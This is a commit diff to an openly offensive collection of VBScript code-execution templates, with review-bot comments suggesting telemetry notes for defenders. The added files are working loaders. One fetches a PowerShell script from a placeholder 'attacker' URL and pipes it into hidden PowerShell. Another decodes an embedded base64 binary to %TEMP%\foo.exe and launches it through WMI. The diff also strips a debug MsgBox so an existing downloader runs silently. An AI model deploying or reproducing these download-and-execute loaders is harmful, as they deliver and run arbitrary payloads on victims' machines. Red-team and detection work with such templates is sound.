Added code-exec-templates and some additions to rogue-dot-net
parent
b7c7da7b4e
commit
8b03b5ba40
@ -15,6 +15,10 @@ Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets usin
|
||||||
|
|
||||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||||
|
|
||||||
|
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
|
||||||
|
|
||||||
|
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
|
||||||
|
|
||||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||||
|
|
||||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||||
|
|
|
@ -29,9 +29,7 @@ If xhr.Status = 200 Then
|
||||||
|
|
||||||
' STEP 3: Execute file
|
' STEP 3: Execute file
|
||||||
cmd = out & " " & parameters
|
cmd = out & " " & parameters
|
||||||
MsgBox cmd
|
|
||||||
sh.Run cmd, 0, False
|
sh.Run cmd, 0, False
|
||||||
|
|
||||||
End If
|
End If
|
||||||
|
|
||||||
Set sh = Nothing
|
Set sh = Nothing
|
||||||
|
|
|
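--- /dev/null
+++ b/download-powershell-and-exec-via-stdin
@@ -0,0 +1,34 @@
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+scriptURL = "http://attacker/script.ps1"
+launcher = "powershell -nop -w hid -Command -"
+
+Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
+xhr.Open "GET", scriptURL, False
+xhr.Send
+
+Function bin2a(Binary)
+Dim I,S
+For I = 1 to LenB(Binary)
+S = S & Chr(AscB(MidB(Binary,I,1)))
+Next
+bin2a = S
+End Function
+
+If xhr.Status = 200 Then
+With CreateObject("WScript.Shell")
+With .Exec(launcher)
+.StdIn.WriteLine bin2a(xhr.responseBody)
+.StdIn.WriteBlankLines 1
+.Terminate
+End With
+End With
+End If
+
+Set xhr = Nothing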
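Review bot: The header comment at the top of this new file describes the purpose of the template but not the artifacts it produces, which is what a reader of a templates collection needs in order to recognise it; the header lines still say "binary file ... saving it to the local filesystem", which no longer matches this file, since nothing here writes to disk and the script is passed to PowerShell over StdIn. I would rewrite the second and third header lines to `' Example of downloading a PowerShell script from a URL and passing it to powershell.exe via StdIn.` and add `' Telemetry: the script host spawns powershell.exe with "-nop -w hid -Command -" and feeds it over StdIn, so the process-creation event (parent/child and command line) is the primary observable; the fetch goes over plain HTTP to the hard-coded scriptURL and shows up in proxy/DNS logs.` The claim that nothing touches disk is limited to what is visible in this file; the referenced script.ps1 is not part of the commit.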
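--- /dev/null
+++ b/drop-binary-file-and-launch.vbs
@@ -0,0 +1,47 @@
+'
+' Example of dropping an embedded, base64 encoded binary file to the disk,
+' decoding it and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+saveFileAs = "%TEMP%\foo.exe"
+launchParameters = ""
+
+' =============================================================
+
+fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
+
+' =============================================================
+
+Function Base64Decode(ByVal vCode)
+Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
+oNode.dataType = "bin.base64"
+oNode.text = vCode
+Base64Decode = oNode.nodeTypedValue
+Set oNode = Nothing
+End Function
+
+Dim sh: Set sh = CreateObject("WScript.Shell")
+out = sh.ExpandEnvironmentStrings(saveFileAs)
+
+With CreateObject("Adodb.Stream")
+.Open
+.Type = 1
+.write Base64Decode(fileBuffer)
+.savetofile out, 2
+End With
+
+computer = "."
+Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
+& computer & "\root\cimv2")
+
+Set startup = wmi.Get("Win32_ProcessStartup")
+Set conf = startup.SpawnInstance_
+conf.ShowWindow = 12
+
+Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
+
+command = out & " " & launchParameters
+proc.Create command, Null, conf, intProcessID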
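Review bot: The header comment of this new file does not record the two artifacts the code visibly leaves, which is the information a reader of this collection needs: the decoded blob is written to `%TEMP%\foo.exe` by the `.savetofile out, 2` line, and the file is then started through `Win32_Process.Create` rather than by the script host itself. I would add to the header `' Telemetry: writes the decoded binary to %TEMP%\foo.exe (file-creation event from the script host process) and launches it via WMI Win32_Process.Create, so the new process is typically parented by the WMI provider host rather than wscript/cscript; correlate the file write with the WMI-launched process.` The `proc.Create command, Null, conf, intProcessID` call also returns a status code and fills `intProcessID`, neither of which the script reads, so a one-line comment stating that the result is intentionally ignored would save the next reader from wondering whether that is an oversight.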